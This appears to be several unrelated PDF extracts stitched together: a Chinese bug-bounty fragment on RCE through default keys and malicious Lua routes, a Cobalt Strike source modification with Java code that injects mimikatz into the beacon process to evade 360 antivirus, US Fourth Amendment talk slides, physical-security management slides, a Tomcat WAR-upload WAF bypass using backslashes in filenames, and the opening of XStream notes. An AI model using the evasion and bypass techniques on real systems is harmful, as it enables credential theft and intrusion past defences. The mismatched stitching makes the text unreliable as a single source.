Wri t t en by J 0o1ey: 547006660
0x05 测试环境默认key的原罪到RCE
随后在下⾯四个隐藏⼦域尝试默认key添加恶意lua路由,发现均成功
添加恶意路由后,就是⼀⻢平川,直捣⻩⻰了
Wri t t en by J 0o1ey: 547006660
⽬标是运⾏在k8s上的,掐指⼀算应该是测试环境⽤了默认key的⽼镜像,运维也没做修改,导致了RCE的⼤锅
交完四处命令执⾏,奖励⾃⼰晚上吃鸡蛋肠粉加根肠
0x06 技术点总结
结合⽬标域名命名特点,发现隐藏的开发、测试环境资产
完成新突破
Wri t t en by J 0o1ey: 547006660 | pdf |
众所周知,Cobalt Strike的一些功能模块都是用spawn的方法实现,其原理就是启动一个进程,然后对该
进程进行功能模块dll反射注入,默认profile下是启动rundll32.exe这个进程,这种行为在数字的核晶模式
下是会被拦截的。前两天刚好在吐司看到一篇文章有讲到,修改Cobalt Strike的源码将spawn的方式修改
为inject的方法是可以bypass数字核晶的,因为将Cobalt Strike内置的功能模块dll注入到当前进程就没有
新启进程的行为。本文结合上述文章并在@wonderkun师傅的帮助下得到了一个更好的修改方案。
功能模块分析
Cobalt Strike常见的功能如:logonpasswords,hashdump等功能在jar代码实现是
beacon.TaskBeacon.class。
以logonpasswords为例,最终定位到如下代码处。
在MimikatzSmall方法中,根据目标系统版本进行spawn。跟进到MimikatzJobSmall方法,最后rdi的是
mimikatz-min.x64.dll或者mimikatz-min.x86.dll这个dll。
public void LogonPasswords()
{
MimikatzSmall("sekurlsa::logonpasswords");
}
public void MimikatzSmall(String paramString)
{
for (int i = 0; i < this.bids.length; i++)
{
BeaconEntry localBeaconEntry = DataUtils.getBeacon(this.data, this.bids[i]);
if (localBeaconEntry.is64()) {
new MimikatzJobSmall(this, paramString).spawn(this.bids[i], "x64");
} else {
new MimikatzJobSmall(this, paramString).spawn(this.bids[i], "x86");
}
}
}
public class MimikatzJobSmall
extends MimikatzJob
{
public MimikatzJobSmall(TaskBeacon paramTaskBeacon, String paramString)
{
super(paramTaskBeacon, paramString);
}
public String getDLLName()
{
if (this.arch.equals("x64")) {
return "resources/mimikatz-min.x64.dll";
}
return "resources/mimikatz-min.x86.dll";
}
}
修改Java
只需要将spawn方法修改inject方法即可,jar里实现的inject方法的需要传入pid,因为我们是注入当前进
程,所以需要通过jar里实现的方法去获取当前进程的pid。另外需要注意的就是下面代码中的
localBeaconEntry.arch()获取是当前进程的位数,而原来代码里的localBeaconEntry.is64()获取系统的位
数。因为我们用到的是inject,所以需要在x64的进程中注入x64的dll,x86的dll中注入x86的dll。
DLL加解密
因为Cobalt Strike中的DLL是加密的,需要进行解密才能对其dll进行修改。相关操作这里就不再详细说
了。
具体可以参考: https://github.com/lovechoudoufu/cobaltstrike4.4_cdf#dll%E4%BF%AE%E6%94%B9
修改相应的DLL
以logonpasswords为例,最后rdi的是mimikatz-min.x64.dll或者mimikatz-min.x86.dll这个dll。ida看一下
这个dll,可以看到DLL的核心功能是在dllmain中完成的,调用功能函数之后,会直接调用ExitProcess 退
出了进程。
public void MimikatzSmall(String paramString)
{
for (int i = 0; i < this.bids.length; i++)
{
BeaconEntry localBeaconEntry = DataUtils.getBeacon(this.data, this.bids[i]);
int PID = CommonUtils.toNumber(localBeaconEntry.getPid(), 0);
if ("x64".equals(localBeaconEntry.arch())) {
new MimikatzJobSmall(this, paramString).inject(PID, "x64");
//new MimikatzJobSmall(this, paramString).spawn(this.bids[i], "x64");
} else {
new MimikatzJobSmall(this, paramString).inject(PID, "x86");
//new MimikatzJobSmall(this, paramString).spawn(this.bids[i], "x86");
}
}
}
这对于spawn方法是没有问题的,因为是新启动的rundll32.exe进程,执行完功能之后执行ExitProcess退
出,但是被改成inject之后就有问题了,因为是在当前beacon进程空间中执行的,所以执行完功能会到
导致当前的beacon进程挂掉。所以我们直接patch掉这个对ExitProcess的调用就可以了,但是看了一下对
ExitProcess的调用是有多处的,一个一个patch太麻烦了。
所以这里有个更好的方法,就是直接把 ExitProcess修改为ExitThread方法 。由于当前的dll是被inject方
法调用起来的,是在当前进程空间新启动的线程,所以当前进程挂掉之后,beacon进程的主线程不会受
到影响。这里利用 CFF Explorer 修改导入表就可以了。
然后再用ida打开,发现调用的就是ExitThread了。
测试
将dll和java修改完后,直接替换jar里的即可。简单测试一下是否过数字核晶。
我们直接执行mimikatz coffee命令,这里的mimikatz和logonpasswords调用的是不同的两个dll,其中
logonpasswords是用inject方法,而mimikatz coffee未做修改,用的spawn方法。可以看到未修改的被拦
截了,而修改过的成功执行回显。
BUG
如果我们上线的进程为x86的进程,而目标系统位数为x64位,此时我们执行logonpasswords,会对其x86
进程注入x86的dll。此时会报错,报错内容为:
这主要是内置的mimikatz的dll存在问题,msf中的mimikatz也会存在这个问题。因为目标系统为x64,所
以需要一个x64的进程来注入x64的dll,即可。
ERROR kuhl_m_sekurlsa_acquireLSA ; mimikatz x86 cannot access x64 process
参考文章
https://www.t00ls.cc/viewthread.php?tid=65597 | pdf |
They took my laptop!
The Fourth Amendment explained
Disclaimer
It is vitally important for you to
understand that while I am an
attorney, I am not your attorney.
In no way, shape, or form is this
presentation intended to provide you
with legal advice.
Before relying or acting upon any
information learned from this
presentation you should consult a
licensed attorney in your State.
Introduction
Overview
The Constitution
Intro to the Fourth
Suspicion Standards
Exceptions
They took my laptop!
Hypothetical applications
Modern case overviews
Question & Answer Period
The Constitution
Pop Quiz Hot Shots
The Constitution Quiz
Q: How many Articles does the
constitution contain?
A: 7 + Preamble, Signatures
The Constitution Quiz
Q: How many amendments are
there?
A: 27
The Constitution Quiz
Q: The first ten amendments are
called?
A: The bill of rights
The Constitution Quiz
Q: Which article applied most of
the bill of rights to the states?
A: 14th Amendment.
The Constitution Quiz
Q: Which article or amendment
contains the section on privacy?
A: None. It‟s a judicial fiction.
The Constitution Quiz
Q: When was the last amendment
to the constitution ratified?
A: May 7th, 1992
The Constitution Quiz
Q: When was it proposed?
A: September 25th, 1789 - James
Madison
The Constitution Quiz
Q: President Barack Obama was
a professor of ____ law?
A: Constitutional Law
Back to the point…
Introduction to
„The Fourth‟
The Fourth Amendment
“The right of the people to be secure in
their persons, houses, papers, and effects,
against unreasonable searches and
seizures, shall not be violated, and no
warrants shall issue, but upon probable
cause, supported by oath or affirmation,
and particularly describing the place to be
searched, and the persons or the things to
be seized.”
Amendment IV
Two separate clauses
„Reasonableness‟ Clause
“The right of the people to be secure in their
persons, houses, papers, and effects, against
unreasonable searches and seizures, shall not
be violated…”
„Warrant‟ Clause
“… no warrants shall issue, but upon probable
cause, supported by oath or affirmation, and
particularly describing the place to be
searched, and the persons or the things to be
seized.”
Search and Seizure
Separate
Examples:
Person Seized and Searched
Car pulled over, Driver Frisked
Person Seized but not Searched
Traffic Citation
Person Searched but not Seized
Thermal Scans, X-Rays, etc.
Brain Scans..?
Search / Seizure
Defined
Search
Expectation of Privacy
Seizure
Individual - when a person believes
he is not free to ignore the
government‟s presence
Property - Meaningful
interference with an individual‟s
possessory interest
Suspicion Standards
Mere Suspicion
A hunch or feeling
Reasonable Suspicion
Premised upon articulable facts and
circumstances
Probable Cause
Search
Reasonable believe that evidence /
contraband will be found
Arrest
Facts and circumstances indicate that a
person had committed or was committing a
crime
Exceptions to the Rule
Border
Plain view
Open Fields
Exigent Circumstances
Search incident to arrest
Civil search
Motor Vehicle (reduced)
Public Schools (reduced)
Consent
The Fifth Amendment
… nor shall be compelled in any criminal
case to be a witness against himself, nor be
deprived of life, liberty, or property,
without due process of law; …”
Amendment V
When does it apply?
The fifth amendment applies when a
statement or act is:
compelled;
Cannot be voluntary
testimonial; and
Says or doesn‟t say something
Authenticates existence, ownership, etc.
Incriminating
Subjects to criminal responsibility
Applies equally in civil / criminal settings
Contents
“Although the contents of a
document may not be privileged,
the act of producing the
document may be.” United States
v. Doe, (1984)
Exceptions to the Rule
Physical evidence is not testimony
Fingerprints
Blood Samples
Hair
Voice Samples
Etc.
“Foregone Conclusions”
If they know it exists and can prove it by
other means
Requires a grant of immunity
The Lock vs. The Safe
A lock is physical evidence
Not a product of the mind
Subject to subpoena
The combination to a safe is not
physical evidence
Is a product of the mind
Not subject to a subpoena, unless...
Use / Derivative Use
Immunity
If the government promises not to
use the „production‟ of the evidence
against the defendant; and
Can independently verify the
existence of the evidence; then
the 5th Amendment doesn‟t apply
18 U.S.C. § 6002
Whenever a witness refuses, on the basis of his
privilege against self-incrimination, to testify or
provide other information in a proceeding before
or ancillary to:
(1) a court or grand jury of the United States…
[If ordered], the witness may not refuse to comply
with the order on the basis of his privilege against
self-incrimination; but no testimony or other
information compelled under the order (or any
information directly or indirectly derived from
such testimony or other information) may be used
against the witness in any criminal case…
They took my
laptop!
Resident Aliens
(really quickly)
Resident Aliens
Generally - aliens treated the same
under the U.S. Constitution as
Citizens
Wong Wing v. U.S. (U.S. 1896) -
Established that an an alien subject
to criminal proceedings is entitled
to the same constitutional
protections available to citizens
Rasul v. Bush (U.S. 2004) - Degree of
control over Gitmo is sufficient to
trigger habeas corpus rights
Resident Aliens
Wong Wing v. U.S. (U.S. 1896) - The
contention that persons within the
territorial jurisdiction of this
republic might be beyond the
protection of the law was heard
with pain on the argument at the bar -
- in face of the great constitutional
amendment which declares that no
state shall deny to any person
within its jurisdiction the equal
protection of the laws.
Resident Aliens
Hamdi v. Rumsfeld (U.S. 2004) - "a
state of war is not a blank
check for the President when it
comes to the rights of the
Nation's citizens."
Lets try to make
this fun
The Rules
All scenarios Warrantless, unless
stated otherwise
It is the current date
Hypotheticals
Name: SkyDog
Age: Really Old
Occupation:
Hacker
Consortium
Godfather
Prisoner #: 42
Not real SkyDog actions, I hope. only using his name.
Communications
SkyDog has just attended
Outerz0ne „09 and decides to
tell his friends, all 2 of them,
how amazing it was.
He calls, writes a letter to, and
emails his friend Wrench (in
Nashville) and Bush (in Iraq)…
SkyDog‟s Friends
Wrench
Bush
Communications
Mail
U.S. v. Seljan (9th Cir., 2008) (Ok to read foreign
letters without suspicion)
U.S. v. Ramsey (U.S., 1977) (Reasonable Suspicion
req‟d)
FISA Court Approval of Warrantless Wiretapping
One party believed to be outside the U.S.
Does not apply to pre protect america act (PAA)
wiretapping
Email
On personal machine - Warrant or exception
On remote server - available by subponea
Account Information - Court order
Private Search
After Outerz0ne „09, SkyDog
returns to Nashville only to find
he‟s been evicted and his laptop was
stolen by some Asshats.
One of the Asshats turned on the
laptop, found all of SkyDog‟s
Hacker Consortium files, freaked
out, and called the police. The
police have Scott Moulton run
EnCase on Sky‟s machine…
Private Search
U.S. v. Runyan (5th, 2002)
Examining part of a system does
not open all parts
U.S. v. Crist (M. Dist. Pa, 2008)
Using EnCase to hash files is a
„search‟
Private Search
SkyDog gets back his laptop from
the police and boots up Windows
Millennium. The machine is hacked
into by a Turkish citizen on the hunt
for terrorist hackers.
After finding SkyDog‟s Hacker
Consortium documents, the man
quickly reports SkyDog to the FBI…
Private Search
Unknownuser Cases
U.S. v. Steiger (11th Cir. 2003)
U.S. v. Jarrett (E.D. Va, 2002)
Private Search Factors
Government encouraged/initiated
the search; or aware/acquiesced
to the search?
And did the private actor intend to
help law enforcement?
Border Crossing
SkyDog is stressed out and takes a
vacation to Mexico and engages in
some serious drinking. While
returning, he has a feeling is going
to be searched and not being quite in
his right mind, SkyDog swallows his
cellphone. He also attempts to
„hide‟ his laptop but is unable to fit it
...
SkyDog was selected for a search…
What this might look like
Border Crossing
U.S. v Arnold (9th Cir, 2007) -
Laptops no different from closed
containers which are subject to
suspicionless searches
Routine
Allowed by fact that you‟re
crossing the border
Non-Routine Searches
Requires reasonable suspicion
Border Crossing
While searching his laptop the
officers find a drive named „My
Illegal Files‟ and proceed to
open a document containing
what appears to be a listing of
credit card numbers. They
confiscate the laptop but upon
turning it back on they find the
drive has been encrypted…
Border Crossing
In Re Boucher (M.D. Vt, 2008) -
Encryption keys are products of the
mind and are not subject to
disclosure under the 5th amendment
In Re Boucher (M.D. Vt, 2009) - Wait,
never mind it was a foregone
conclusion.
The vault code v. key to a lock
debate
Border Crossing
Because of the heavy drinking
SkyDog‟s eyes are red, his skin is
pale (more so than usual), and
he has the shakes…
Strip Search
Non-Routine, so it requires more.
Usually part of an inventory search,
so not „criminal‟ in nature
Recent Cases (non-border)
Subjecting a 13 year old student to a
strip search unreasonable when looking
for IB Profin 800mg.
Subjecting a female motorist to a strip
search after arrest for a misdemeanor
marijuana possession, unreasonable.
Especially, while it watched by male
officers over the closed circuit t.v.
system.
Border Crossing
During the strip-search, the
examining officer noticed a lump
in SkyDogs throat…
Bodily Intrusion
Non-Routine
A lot of crossover with the other
amendments
May require a warrant depending on
the level of urgency required, even
at the border
Let‟s just say SkyDog would be sore
in the morning…
Arrested
Because of all the odd behavior
and suspicious actions SkyDog
is arrested on suspicion of
Smuggling --something. During
the booking SkyDog‟s Phone
Rings…
Answering Cellphone
U.S. v. De La Paz (S.D. NY, 1999) -
Agents had probable cause to
believe that a cell phone, a
common tool in the drug trade,
would provide further evidence.
Due to the temporal nature of a
phone call, it was not
unreasonable for police to
answer the call.
The beat down
After some investigation SkyDog is
released. He returns home to his
neighbor being beaten by a masked
man who runs through his house.
Police arrive and SkyDog consents
to a search of his house.
the police notice a „Stolen Credit
Cards‟ folder on his desktop. They
begin search through his computer…
The beat down
U.S. v. Turner (1st Cir, 1999) - Even
though consent to a search was
given, the consent did not extend
beyond evidence of the assault. The
initial evidence, however, would be
available under plain view exception.
Military Invasion
It turns out that the „Stolen Credit
Cards‟ folder was actually just his
al & tigger porno, all 25 tbs, so he is
released again.
Unfortunately, those
emails/letters SkyDog sent to Bush
looked like terrorist documents.
The President orders a raid, by the
military, of both SkyDog‟s and
Bush‟s houses…
SkyDog Porn Sample
Military Invasion
Bush Memo (2003) - "... our Office
recently concluded that the Fourth
Amendment had no application to
domestic military operations”
In Re: Terrorist Bombings (2nd Cir,
2009) - “The Fourth Amendment‟s
requirement of reasonableness —
but not the Warrant Clause — applies
to extraterritorial searches and
seizures of U.S. citizens”
So what can I do about it?
Don‟t keep sensitive data, memorize
everything and eat the evidence
Only travel with „clean‟ equipment
Format, download data over secured channels
upon arrival
Encrypt Liberally
Never physically store the key
Ideally have a physical / non-physical key
Shutdown equipment long before crossing
Use bios passwords
Never travel with something you can‟t
afford to lose.
Miscellaneous. Recent
Cases
Herring v. U.S. (U.S., 2009) - Exclusionary
rule does not apply “when police mistakes
are the result of negligence such as that
described here.”
State v. Stephenson (Minn. App, 2009) -
Defendant excluded from home by court
order had no reasonable expectation of
privacy.
Wisconsin v. Sveum (Wi. App, 2009) -
Warrantless GPS tracking OK.
People v. Weaver (Ny., 2009) - Warrantless
GPS tracking not OK.
Disclaimer
It is vitally important for you to
understand that while I am an
attorney, I am not your attorney.
In no way, shape, or form is this
presentation intended to provide you
with legal advice.
Before relying or acting upon any
information learned from this
presentation you should consult a
licensed attorney in your State.
The End | pdf |
Physical
Security
(You’re Doing It Wrong)
A.P. Delchi
Saturday, July 3, 2010
# whois delchi
‣ Infosec Rasputin
‣ Defcon, HOPE, Pumpcon,
Skytalks
‣ Minister of Propaganda &
Revenge, Attack Research
Saturday, July 3, 2010
# whois delchi
$DIETY
Grant me the serenity to accept
people who will not secure their
networks,
the courage to face them when
they blame me for their
problems,
and the wisdom to go out
drinking afterwards
Saturday, July 3, 2010
“You’re Doing It Wrong”
A phrase
meaning that
the method you
are using is not
creating the
desired result
Saturday, July 3, 2010
Your MissioN
Saturday, July 3, 2010
Your MissioN
Design and implement a physical
security system for a new facility,
to include multi-factor
authentication and video
surveillance.
Saturday, July 3, 2010
Saturday, July 3, 2010
Saturday, July 3, 2010
Saturday, July 3, 2010
“Proper Previous
Planning Prevents
Piss Poor
Performance”
Dick Marcinko,
“The Rogue Warrior”
Saturday, July 3, 2010
Physical Security
Saturday, July 3, 2010
Physical Security
Physical security describes both measures that prevent or deter attackers from accessing a
facility, resource, or information stored on physical media and guidance on how to design
structures to resist various hostile acts.
en.wikipedia.org/wiki/Physical_security
Saturday, July 3, 2010
Physical Security
Physical security describes both measures that prevent or deter attackers from accessing a
facility, resource, or information stored on physical media and guidance on how to design
structures to resist various hostile acts.
en.wikipedia.org/wiki/Physical_security
Measures to reasonably ensure that source or special nuclear material will only be used for
authorized purposes and to prevent theft or sabotage.
www.nrc.gov/reading-rm/doc-collections/cfr/part110/part110-0002.html
Saturday, July 3, 2010
Physical Security
Physical security describes both measures that prevent or deter attackers from accessing a
facility, resource, or information stored on physical media and guidance on how to design
structures to resist various hostile acts.
en.wikipedia.org/wiki/Physical_security
Measures to reasonably ensure that source or special nuclear material will only be used for
authorized purposes and to prevent theft or sabotage.
www.nrc.gov/reading-rm/doc-collections/cfr/part110/part110-0002.html
The measures used to provide physical protection of resources against deliberate and
accidental threats.
www.tsl.state.tx.us/ld/pubs/compsecurity/glossary.html
Saturday, July 3, 2010
Physical Security
Saturday, July 3, 2010
Methodology
• Assessment
• Assignment
• Arrangement
• Approval
• Action
Saturday, July 3, 2010
Methodology
ASSESSMENT
A thorough examination of the
facility to be protected.
Saturday, July 3, 2010
Methodology
ASSESSMENT
•Scope of property to be protected
•Established points of entry and egress
•Potential points of entry and egress
•Existing security measures
•Evaluation of physical property
•Risk assessment
Saturday, July 3, 2010
Methodology
ASSIGNMENT
Establish the required level of
security for specific areas and
assets within the facility.
Saturday, July 3, 2010
Methodology
ASSIGNMENT
•High level
✓Data Centers
✓Executive Offices
✓Finance & Accounting
• Medium Level
✓ Entry & Egress
✓ Reception
✓ Elevators
• Low Level
✓ Common Areas
✓ Cubicle Farms
Saturday, July 3, 2010
Methodology
ASSIGNMENT
•Considerations
✓ Insurance requirements
✓ Compliance requirements
✓ Fire code requirements
✓ Business requirements
Saturday, July 3, 2010
Methodology
ARRANGEMENT
Establish the most effective
locations for security devices
based on their requirements.
Saturday, July 3, 2010
Methodology
ARRANGEMENT
•Cameras
✓Field of view
✓Redundancy
✓Tracking
• Doorways
✓ Type of locks
✓ Multi factor authentication
✓ Time based restrictions
• Central Control
✓ Cabling limitations
✓ Power, archiving, and disaster planning
Saturday, July 3, 2010
Methodology
APPROVAL
Submit all plans, costs, schedules
and related data to management.
Saturday, July 3, 2010
Methodology
APPROVAL
•Hardware
✓Quotes form multiple vendors
✓Lifetime requirements
✓Service plans
• costs
✓ Plan A, B, and C
✓ Flexibility
✓ Options
• Schedule
✓ Time frame for completion
✓ Interference with business operations
Saturday, July 3, 2010
Methodology
ACTION
Implementing the physical
installation and configuration of
the approved system.
Saturday, July 3, 2010
Methodology
ACTION
•Construction
✓Oversee construction
✓Oversee inspections by state / local govt
✓Manage corrections
• Training
✓ Security officers
✓ Users
✓ Establishing policy & procedure
• Testing
✓ Ensuring the system works as planned
✓ Compliance testing
Saturday, July 3, 2010
What Could
Possibly Go
Wrong?
Saturday, July 3, 2010
"No plan of
operations extends
with certainty
beyond the first
encounter with the
enemy's main
strength."
Count Helmuth von Moltke
Saturday, July 3, 2010
Saturday, July 3, 2010
Methodology
Saturday, July 3, 2010
Methodology
TRAINING
Saturday, July 3, 2010
Methodology
TRAINING
Experience
Saturday, July 3, 2010
Methodology
TRAINING
Experience
Planning
Saturday, July 3, 2010
Saturday, July 3, 2010
Saturday, July 3, 2010
Saturday, July 3, 2010
Saturday, July 3, 2010
Saturday, July 3, 2010
Saturday, July 3, 2010
Saturday, July 3, 2010
Saturday, July 3, 2010
Management
Saturday, July 3, 2010
Management
Saturday, July 3, 2010
Management
PROS :
✓ Provide Budget
✓ Set Requirements
✓ Sign your paycheck
✓ Run the show
Cons :
✓ They know this
Saturday, July 3, 2010
Strife
Saturday, July 3, 2010
Strife
“I want a state of the art
high tech system. FBI,
CIA kind of security”
Saturday, July 3, 2010
Strife
“I want a state of the art
high tech system. FBI,
CIA kind of security”
“I can do that. Based on
your needs, and the
floor plan it will cost
$54,875.”
Saturday, July 3, 2010
Strife
“I want a state of the art
high tech system. FBI,
CIA kind of security”
“I can do that. Based on
your needs, and the
floor plan it will cost
$54,875.”
“Can’t you just buy
something from Costco?”
Saturday, July 3, 2010
Strife
“I want a state of the art
high tech system. FBI,
CIA kind of security”
“I can do that. Based on
your needs, and the
floor plan it will cost
$54,875.”
“Can’t you just buy
something from Costco?”
<REDACTED>
CEO of Information Security Firm
Saturday, July 3, 2010
≠
Saturday, July 3, 2010
Strife
Saturday, July 3, 2010
Strife
“I went to Best Buy and saw a
HDMI cable for $50. I went
home and surfed the internet
for a while and found the
same cable for $2 from a web
site in China. If I can do that
for a cable I expect you to do
the same thing for my
security system.”
Saturday, July 3, 2010
Strife
“I went to Best Buy and saw a
HDMI cable for $50. I went
home and surfed the internet
for a while and found the
same cable for $2 from a web
site in China. If I can do that
for a cable I expect you to do
the same thing for my
security system.”
<REDACTED>
CEO of Fortune 500 Security Firm
Saturday, July 3, 2010
Be knowledgeable on the equipment ,
methodology and best practices for
your industry.
Understand the impact that your
project will have on business & user
activity
Rely on facts, not speculation ,
theory, rumors, or maybes.
Present facts, support with
documentation, explain risk and
impact, prove mitigation
Present in a factual & respectful
manner, showing your work and
explaining your reasoning behind the
design
If you don’t know, you don’t know.
State that you will research and
return with the answers
Be prepared to loose gracefully
Saturday, July 3, 2010
SUCCESS
Saturday, July 3, 2010
SUCCESS
“This is one hell of a security
system. Whoever did this knew
what the hell they were
doing.”
Saturday, July 3, 2010
SUCCESS
“This is one hell of a security
system. Whoever did this knew
what the hell they were
doing.”
<REDACTED>
Visitor,
Friend of CEO of information security firm
Saturday, July 3, 2010
“Shut up, get it done,
failure is not an
option.”
Charles Rawls
VP of ass kicking
dorsai Embassy, Earth
Saturday, July 3, 2010
Vendors
Saturday, July 3, 2010
Vendors
Saturday, July 3, 2010
Vendors
PROS :
✓ Provide Cool Toys
✓ Will Let You PLay with
The Cool Toys
✓ Have historical info on
product quality
Cons :
✓ Will expect you to buy
From Them
Saturday, July 3, 2010
“The Ferengi Rules Of
Acquisition”
$6.99
ISBN : 0671529366
Saturday, July 3, 2010
RULE # 1
There are many , many, many vendors
out there
Saturday, July 3, 2010
RULE # 2
You do not always need the latest,
greatest state of the art item
Saturday, July 3, 2010
RULE # 3
Always deal with vendors between
11 AM & 2 PM
Saturday, July 3, 2010
Reality
Saturday, July 3, 2010
Reality
Requirements
Saturday, July 3, 2010
Reality
Requirements
Saturday, July 3, 2010
Reality
Requirements
RFQ
Saturday, July 3, 2010
Reality
Requirements
RFQ
Saturday, July 3, 2010
Reality
Requirements
RFQ
Quote
Saturday, July 3, 2010
Saturday, July 3, 2010
Never rely on a single vendor
Do not get caught up in vendor wars
Ensure that the vendor is
knowledgeable on the products they
are selling
Do your own product research
Beware of unnecessary up-selling
Get details on all aspects ... warranty,
service , training ....
Do not be afraid to revise your RFQ
Do not be afraid to READ your RFQ
Keep all paperwork, quotes, and RFQ
revisions
Saturday, July 3, 2010
Prioritize your needs to make a
balance between budget and
equipment
Look for hidden costs, cost
creep, feature creep, and
after contract expenses
If you work with multiple
vendors for components of a
system it is YOUR
responsibility to ensure that
the products will work
together
Know up front if sub-
contracting will happen, and if
so do due diligence on the sub
contractors
A high price support contract
does not always mean high
quality support
Saturday, July 3, 2010
Saturday, July 3, 2010
"There are no
honorable bargains
involving exchange
of qualitative
merchandise like
souls. Just
quantitative
merchandise like time
and money."
William S. Burroughs
“Words Of Advice For Young People”
Saturday, July 3, 2010
People Who THINK
They Know More Than You
Saturday, July 3, 2010
People Who THINK
They Know More Than You
Saturday, July 3, 2010
People Who THINK
They Know More Than You
PROS :
✓ They Usually Don’t
✓ Make You Look Good
✓ Annoy Management
Cons :
✓ Rarely Shut Up
Saturday, July 3, 2010
“Of course the
alarm says it’s 105
degrees. The sensor
is on the ceiling, and
heat rises. It’s 105 up
there, but down
here where the
servers are it’s
nowhere near 105.”
<REDACTED>
CEO, MIT MBA,
Said 20 Minutes before servers
automatically shut down due
to thermal alarms
Saturday, July 3, 2010
“Of course the
alarm says it’s 105
degrees. The sensor
is on the ceiling, and
heat rises. It’s 105 up
there, but down
here where the
servers are it’s
nowhere near 105.”
<REDACTED>
CEO, MIT MBA,
Said 20 Minutes before servers
automatically shut down due
to thermal alarms
Saturday, July 3, 2010
Know the difference between
water cooler talk and factual
discourse.
Refute with facts, experience, and
a even tone
Do NOT use personal attacks,
vulgar insults, or questionable
phrases or terms
If they start playing the brownie
points game, stop.
If they start playing politics,
stop.
If they cite something they heard
on AM talk radio, RUN!
Saturday, July 3, 2010
Cut sheets from the vendor are
a better point of reference
than something told to a
coworker by their barber who
heard it from his cousin who
works on the loading dock
where the publish that
technology magazine .
Do not play buzzword bingo
Know what the terms,
acronyms, and technological
phrases you use mean.
Let them kiss ass, while you kick
ass.
Saturday, July 3, 2010
Saturday, July 3, 2010
“What about
biometrics?”
Saturday, July 3, 2010
“What about
biometrics?”
“Biometric three phase
multi-homed active
authentication is the
best!”
Saturday, July 3, 2010
“What about
biometrics?”
“Biometric three phase
multi-homed active
authentication is the
best!”
“I am not paid to listen to
this drivel. You are a
terminal fool.”
Saturday, July 3, 2010
“What about
biometrics?”
“Biometric three phase
multi-homed active
authentication is the
best!”
“*Ahem*”
“I am not paid to listen to
this drivel. You are a
terminal fool.”
Saturday, July 3, 2010
“What about
biometrics?”
“Biometric three phase
multi-homed active
authentication is the
best!”
“*Ahem*”
Saturday, July 3, 2010
Saturday, July 3, 2010
“What about
biometrics?”
Saturday, July 3, 2010
“What about
biometrics?”
“Biometric three phase
multi-homed active
authentication is the
best!”
Saturday, July 3, 2010
“What about
biometrics?”
“Biometric three phase
multi-homed active
authentication is the
best!”
“As per your requirements
the RFQ contains two
factor authentication with
an option for biometrics as
a third, pending budgetary
constraints. The cut
sheets are in your copy of
the RFQ.”
Saturday, July 3, 2010
NO!
Saturday, July 3, 2010
YES!
Saturday, July 3, 2010
CONSTRUCTION
WORKERS
Saturday, July 3, 2010
CONSTRUCTION
WORKERS
Saturday, July 3, 2010
CONSTRUCTION
WORKERS
PROS :
✓ Reliable Timing
✓ Know Trade Secrets
✓ Tell Good Jokes
Cons :
✓ Will Do EXACTLY what
You Tell Them To Do
Saturday, July 3, 2010
Know the work schedule for
the construction team
Meet the foreman. Get his
contact information.
Read the blueprints.
Read the blueprints again, with
the foreman.
Supervise the construction.
Look for things that are not
quite right.
Expect to find surprises.
Expect to pay to fix them.
Saturday, July 3, 2010
Construction workers and
their foreman are the first line
of defense when it comes to
building inspections.
They know what needs to be
done, and why.
They deal with the same state/
county/city building inspectors
on multiple projects.
Listen to them. Do what they
say. This is their area of
expertise, even if the only
adjective they know is “fucking”
“The fucking wiring is not
hooked up to the fucking switch
correctly, so it’s not going to
fucking work. It’s fucked.”
-NJ construction worker
Saturday, July 3, 2010
Construction workers on
your project may not
speak English.
If this is a problem , deal
with it before work
begins.
Consult with HR
before bringing up the
subject.
If you can not
communicate with each
other there is no way to
indicate problems, make
changes, or share dirty
jokes
Saturday, July 3, 2010
Saturday, July 3, 2010
Things WIll Go wrong
Saturday, July 3, 2010
Not all problems
can be solved
with a clever
work-around.
A quick fix today
can be a problem
tomorrow.
Saturday, July 3, 2010
Pizza and beer is
cheaper than
overtime.
Saturday, July 3, 2010
USERS
Saturday, July 3, 2010
USERS
Saturday, July 3, 2010
USERS
PROS :
✓ The Reason You Are Here
✓ Love To Take Classes
✓ Attracted To New Tech
Cons :
✓ Will Expect Your System
To Act The Way They Want
It To
Saturday, July 3, 2010
"If you have responsibility
for security but have no
authority to set rules or
punish violators, your own
role in the organization is
to take the blame when
something big goes wrong."
Professor Gene Spafford
"Practical Unix and Internet Security"
Saturday, July 3, 2010
"Be comforted that in the face of all
aridity and disillusionment,
and
despite the changing fortunes of time,
There is always a big future in computer
maintenance."
"Deteriorata" - National Lampoon, 1972
Saturday, July 3, 2010 | pdf |
勿忘初⼼ - Ch1ng's Blog
Thinking and Acting
⾸⻚
Links
About me
Rss
记⼀次 Tomcat 部署 WAR 包拦截绕过的深究
作者: admin
时间: 2022-05-25
分类: 随便写写,开发
项⽬遇到的好玩技巧
0x01 前⾔
在⼀次项⽬中进⼊ Tomcat 后台,但是部署 WAR 包的时候被拦截,从⽽引发的⼀些列源码审计
0x02 分析过程
在 filename 参数添加 \ 字符的时候发现成功部署了应⽤并且绕过了 WAF 拦截,按照正常逻辑来说,这样的包不应该
被成功部署的。
定位到 Tomcat 的上传应⽤包的 Servlet - HTMLManagerServlet,发现调⽤了 upload ⽅法。跟进
发现获取⽂件名⽤了getSubmittedFileName 函数,跟进
在getSubmittedFileName函数⾥⾯发现使⽤了HttpParser.unquote函数对⽂件名进⾏处理,跟进
通过 Debug 调试得知,当⽂件名遇到有 \ 符号的时候会⾃动的忽略该符号获取下⼀个字符
所以最终的⽂件名由 fu2.\war 变成了 fu2.war
由于 fu2.\war 在流量中WAF是不认为它是⼀个危险的后缀,所以也就不拦截了。往后延伸,其实 \f\u\2\.w\a\r 或
者 demo.w\\\\\\ar 等都可以进⾏绕过,后续看各位师傅的发挥了。
标签: none
添加新评论[⽀持Markdown语法]
登录身份: admin. 退出 »
内容 *
请输⼊验证码
提交评论
上⼀篇: 解决 Cobalt Strike HTTPS Listener ⽆法在 Win7 运⾏问题
下⼀篇: 没有了
© 2022 勿忘初⼼ - Ch1ng's Blog. 由 Typecho 强⼒驱动. | pdf |
XStream 安全研究笔记
1
XStream 安全研究笔记
Created
Tags
⼀、简介
近期,XStream组件频繁爆出安全漏洞,本来打算是⼀年前看XStream组件的,后来因为种种原因⼀直没有看,现在分别爆出了:
CVE-2020-26217、CVE-2020-26258、CVE-2020-26259,打算重新回过头再看看XStream的代码。
XStream的架构主要由四个模块组成,分别是:
Converters
Drivers
Context
Facade
